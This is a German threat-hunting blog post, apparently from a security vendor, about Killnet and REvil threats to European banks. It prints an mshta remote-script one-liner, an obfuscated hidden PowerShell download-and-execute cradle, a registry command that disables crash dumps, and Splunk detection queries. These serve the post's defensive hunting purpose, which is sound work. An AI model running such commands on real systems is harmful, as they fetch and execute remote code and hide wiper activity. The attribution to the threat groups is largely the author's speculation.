Killnet & REvil - Bankensystem in Europa bereits angegriffen

Das unter dem Namen Killnet bekannte pro-russische Hacktivistenkollektiv und eine weitere russischsprachige Hacktivistengruppe namens Anonymous Sudan kündigten am 14. Juni um 18 Uhr auf ihren offiziellen Telegram-Kanälen an, dass sie in den nächsten 48 Stunden westliche Finanzinstitute ausschalten wollen. Zu den mutmaßlichen Zielen gehören europäische und US-amerikanische Banken, das SWIFT-System und die westlichen Zentralbanken. Es wurden jedoch keine Einzelheiten über die Art der geplanten Angriffe bekannt gegeben. Ein neuer Telegram-Kanal, der vermutlich der bekannten Ransomware-Gruppe REvil gehört, wurde eingerichtet, um noch mehr Aufsehen zu erregen, was angesichts der zahlreichen Medienartikel, die über diese Geschichte berichtet haben, auch gelang.

Nach der Ankündigung von Killnet und REvil, dass sie innerhalb der nächsten 48 Stunden versuchen werden, das europäische Bankensystem anzugreifen, haben sie heute vor nicht einmal 2 Stunden tatsächlich die European Investment Bank angegriffen und auch Microsoft macht heute massive DDoS-Angriffe für Störungen von Azure, Outlook und OneDrive verantwortlich.

In dem Video der Bedroher wurde deutlich, dass es sich diesmal nicht um einen gewöhnlichen DDoS-Angriff handelt, sondern das Ziel ist, das gesamte System lahmzulegen.

Eine Möglichkeit wäre, eine Analyse ihrer früheren Anschläge für beide kriminellen Gruppen vorzunehmen, was durchaus Sinn macht. Ich habe mir jedoch die Frage gestellt, ob sie ihre vorherigen Anschläge wie üblich mit ihren bisherigen Fähigkeiten nutzen würden oder ob sie neue Wege beschreiten.

Killnet hatte bereits vor einiger Zeit angedeutet, dass sie nun eine Art privater Militärunternehmensdienste anbieten würden, um die Fähigkeiten ihrer "Kunden" zu erweitern. Man könnte das Video nun als Fake abtun und die Situation verharmlosen, aber angesichts der Tatsache, dass es letzte Woche Angriffe auf das russische Bankensystem gab und dies zu tagelangen Ausfällen führte, wäre ein "Rachefeldzug" mit Kriminellen aus dem Kreml denkbar. Immerhin sind Killnet und REvil offiziell losgelöste Kriminelle, wie in einigen Bedrohungsberichten zu lesen ist, und die Verbindungen zum GRU sind lose. Putin könnte sagen, dass er für einen von Kriminellen verursachten Absturz nicht verantwortlich ist.

Ausgehend von der Tatsache, dass Ransomware-Gruppen in der Vergangenheit wiederholt Tools verwendet haben, um nicht durch die Verwendung legitimer Tools aufzufallen, wäre es am sinnvollsten, rückwärts zu denken und sich zu fragen: Wenn ein russischer Aktivist oder Russland selbst Server in Europa oder Amerika platzieren würde, wie würden sie es tun? Sicherlich versteckt, aber wie?

Censys C2-Analyse der russischen Infrastruktur in den USA

Es gibt eine sehr interessante Analyse von Matt Lembright von Censys, der herausgefunden hat, dass russische Ransomware-Gruppen ihre Infrastruktur unauffällig über gängige C2-Lösungen wie das Pentesting-Tool PoshC2 oder andere legitim genutzte Tools wie DeimosC2 aufbauen können. Dies würde von Scans nicht bemerkt werden, wenn nicht ungewöhnliche Ports wie 3443 für Acunetix, 8443 für DeimosC2 oder Port 8000 für PoshC2 und die Manipulation von Zertifikaten über Port 433 auf diesen Servern stattgefunden hätten. Warum also nicht auch auf europäischen Servern nach diesen Indikatoren suchen, zum Beispiel mit Hilfe der NATO-Militärs und des CERTS und seiner Verbündeten?

Als Unternehmen haben Sie natürlich nicht unbedingt die Mittel, dies zu tun, und ehrlich gesagt auch nicht die Möglichkeiten, Tausende von Servern zu scannen, aber Sie können zumindest Ihre eigene Infrastruktur überprüfen, um festzustellen, ob die entsprechenden Pentesting- und C2-Lösungen in letzter Zeit verwendet wurden und ob auf diesen Ports irgendwelche Anomalien aufgetreten sind.

Für PoshC2 können Sie z.B. auch nach PowerShell-Befehlen suchen, die Sie auch gleichzeitig wie gewohnt mit den Atomic Red Team Tests für T1059.001 testen können, um die Telemetriedaten zu verstehen und entsprechende Erkennungen für das Pentesting-Tool wie PoshC2 mit Mimikatz zu erstellen, wie ein Beispiel in Test #9:

C:\Windows\system32\cmd.exe /c “mshta.exe javascript:a=GetObject(‘script:#{url}’).Exec();close()”

Der HUNTER von Cyborg Security hat auch mindestens ein Beispiel von PoshC2 mit einem versteckten PowerShell-Befehl, den Sie sofort testen und in Ihren eigenen Systemen jagen können, da das Hunt-Paket in der Community-Version kostenlos verfügbar ist:

powershell -windowstyle hidden -command " powershell.exe -nop -Exec Bypass (New-Object System.Net.WebClient).DownloadFile((("{2}{0}{3}{1}" -f':','aw','https','//r')+'.gi'+("{1}{0}"-f'us','thub')+'er'+'con'+'t'+'e'+("{0}{1}"-f 'nt.c','om')+("{0}{1}" -f'/C','yb')+("{1}{0}" -f 'rgSe','o')+("{0}{1}"-f'cu','ri')+'ty/'+("{1}{0}" -f 'ybo','c')+("{0}{1}" -f'rg','-a')+("{1}{0}{2}" -f'omi','t','c-r')+("{0}{1}"-f 'ed','-te')+("{1}{0}" -f'/ma','am')+("{0}{1}"-f 'ste','r')+'/a'+("{2}{1}{0}{3}" -f 's/T','mic','to','A00')+("{1}{0}" -f'c','03/')+("{2}{0}{1}" -f 'l','c.js','a')), $env:APPDATA + (('{0}ca'+("{0}{1}" -f 'lc.j','s')) -F[chaR]92)); Start-Process $env:APPDATA'\calc.js'

Eine weitere Vermutung, die ich habe, ist, dass Killnet und REvil versuchen werden, über C2-Tools in die Systeme der Banken zu gelangen, dort alles still und heimlich vorzubereiten und dann im letzten Schritt mittels eines Rootkits einen WIPER einzusetzen, wenn es soweit ist.

Crash Dump deaktivieren

Wie können sich die Banken also darauf vorbereiten? Es gibt verschiedene Möglichkeiten, dies zu tun. Sie könnten zum Beispiel Wiper wie DriverSlayer studieren und speziell nach der MITRE ATT&CK-Subtechnik 1543.003 forschen. Zu diesem Zweck gibt es einen sehr interessanten Artikel von Crowdstrike mit den notwendigen technischen Informationen, um entsprechend zu jagen; oder Sie können das Hunting-Paket der Community-Version von HUNTER sowie weitere Huntings zur Deaktivierung eines Crash-Dumps nutzen, die bei den beiden Malware-Varianten DriverSlayer und HermeticWiper zum Einsatz kommen würde.

Die Deaktivierung von Crash Dumps ist eine Möglichkeit, weitere Analysen zu verhindern, wenn Aktionen auf einem Host fehlschlagen oder ein Teil des Systems abstürzt. Im Zusammenhang mit der Hermetic Wiper-Malware wurde festgestellt, dass die Malware keine eingebauten API-Aufrufe zur Durchführung ihrer Aktionen verwendet. Dies bedeutet, dass der gesamte Funktionscode in der Malware enthalten war und sich als instabil erweisen könnte. Abgesehen davon, dass die API-Aufrufe für die Malware-Autoren leicht zugänglich sind, sorgen sie auch für ein gewisses Maß an Stabilität der ausführbaren Datei, insbesondere nach mehreren Iterationen von Updates und Patches für das Betriebssystem. In einigen Fällen können Crash Dumps in Windows auch an Microsoft zurückgeschickt werden, wo sie auf eine Zunahme von Abstürzen überwacht werden, die entweder mit Problemen oder mit Malware/Ausbrüchen in Verbindung stehen. Dadurch könnte auch dieses Frühwarnsignal vermieden werden.

reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\CrashControl" /v "CrashDumpEnabled" /t REG_DWORD /d "0" /f

index=* sourcetype=* (registry_path="*Control\\CrashControl*" registry_key_name="CrashDumpEnabled" registry_new_value_name IN ("*0)" "*0"))

| rename registry_old_value_name as registryOldValue, registry_new_value_name as registryNewValue registry_key_name as registryKey process_id as processId hostname as hostname | stats min(_time) as firstSeen, max(_time) as lastSeen, values(registryKey) as registryKey, values(registryNewValue) as registryNewValue, values(registryOldValue) as registryOldValues, values(processId) as processId count by hostname | convert ctime(*Seen)

Wenn Sie die entsprechenden Telemetriedaten und Ereignisse kennen, können Sie auch eine Erkennung darauf aufbauen, wie Sysmon 6 für das Laden des Treibers oder Sysmon 13 für die Änderung der Registrierung. Zusätzlich wäre es interessant, die Treiber-IOC für Änderungen in C:\Windows\System32\drivers\bpdr.sys.

Die HUNTER-Community-Version bietet daher weitere großartige Jagdpakete (Beispiel Splunk)

index=* sourcetype=* TERM(system32) (service_file_path="*Windows\\System32\\drivers*") | regex service_file_path="(?i).*\\\\Windows\\\\System32\\\\drivers\\\\[a-zA-Z]{4}\\.sys" | rename service_file_path as serviceFile service_name as serviceName hostname as hostname | stats min(_time) as firstSeen max(_time) as lastSeen values(serviceFile) as serviceFile values(serviceName) as serviceName count by hostname | convert ctime(*Seen)

Emulation von Bedrohungsakteuren

Andere Empfehlungen wären, BAS-Tools zu verwenden, um z.B. die Kampagnen von REvil zu emulieren, und, wenn Sie kein BAS-Tool haben, zumindest ein eigenes Feldhandbuch zu erstellen, das den MITRE ATT&CK-Techniken entspricht und mit Hilfe von Atomic Red Team erstellt wird. Wie Sie dies tun können, lesen Sie bitte in meinem Artikel über REvil. Hier empfehle ich als Ausgangspunkt die verschiedenen MITRE ATT&CK-Techniken für Initial Access und die von REvil verwendete Malware sowie deren C2-Methoden.

Wenn Sie auf Nummer sicher gehen wollen, studieren Sie die verschiedenen Angriffsmöglichkeiten von DDoS und folgen Sie den Empfehlungen des deutschen BSI und der amerikanischen CISA.

Sobald Sie die Angriffstechniken von Killnet und REvil kennen und mögliche weitere Hypothesen durchgespielt haben, können Sie diese in einer MITRE ATT&CK-Matrix abbilden, um die wichtigsten Techniken der Angreifer zu verstehen. Das beste CTI-Tool, um dies zu tun und Daten zu korrelieren, ist wiederum Tidal, das Sie in der Community-Edition kostenlos nutzen können.

Unabhängig von den aktuellen Bedrohungen lohnt es sich auf jeden Fall, Vorkehrungen für den Ernstfall zu treffen, die Systeme regelmäßig auf Rootkits zu scannen und Erkennungen für ungewöhnliche Treiberaktivitäten und versteckte Befehle zu schreiben, die in PowerShell mit Befehlen ausgeführt werden, die C2-Tools wie PoshC2 verwenden.

Das Ziel solcher Hacktivisten ist meist die Erregung von Aufmerksamkeit, Desinformation, Propaganda (und wenn möglich finanzieller Gewinn). So haben wir beispielsweise festgestellt, dass viele Hacktivisten manchmal Behauptungen über angebliche Ausfallzeiten auf Seiten der Opfer fälschen und die tatsächlichen Ergebnisse ihrer Angriffe oft weit überbewerten.

Die Vermutung, dass sich Mitglieder der nicht mehr existierenden Ransomware-Gruppe REvil an dieser Kampagne beteiligen würden, ist jedoch sehr überraschend und bleibt bis jetzt völlig unbestätigt. REvil wurde Ende 2022 vom FSB verhaftet und scheint sich seitdem in neue kriminelle Gruppen aufgeteilt zu haben. Es ist wahrscheinlicher, dass Killnet versucht, den Ruf von REvil zu nutzen, um seinen Kommunikationsplan voranzutreiben, als dass die Ransomware-Bande sich unter ihrem alten Namen pro-russische Hacktivisten anschließt (es sei denn, es gibt Geld zu verdienen).

Wir empfehlen Ihnen die Implementierung Ihrer Anti-DDoS-Abwehrstrategien und insbesondere Ihre Reaktionsfähigkeit und Kommunikationspläne für den Fall einer Krise ausgiebig zu testen.

Nicht zuletzt können Sie mit unseren Analysten-Services auch lernen und optimieren, wie Sie solche Bedrohungsakteure oder Tools analysieren können. Orange Cyberdefense bietet Ihnen speziell auf Kundenbedürfnisse zugeschnittene Härtungsempfehlungen und zeigt Kunden in einem Workshop, wie sie die gesammelten MITRE ATT&CK Techniken optimal analysieren können. Neben der Bedrohungsmodellierung analysieren wir im Assessment, wie Sie spezifische Malware-Tools auf MITRE ATT&CK-Techniken implementieren und technisch verstehen und wie Sie Ihre eigenen CTI-Reports erstellen und optimieren können, um die proaktive Jagd, die Emulation und das Schreiben von Detection für und mit Ihnen zu verbessern. Dabei handelt es sich um einen iterativen Prozess, der schnell umsetzbar, starr und messbar sein sollte, damit die Verbesserung auch messbar und wiederholbar ist. Wenn Sie mehr erfahren möchten, besuchen Sie bitte unsere Website oder nehmen Sie direkt Kontakt mit mir auf.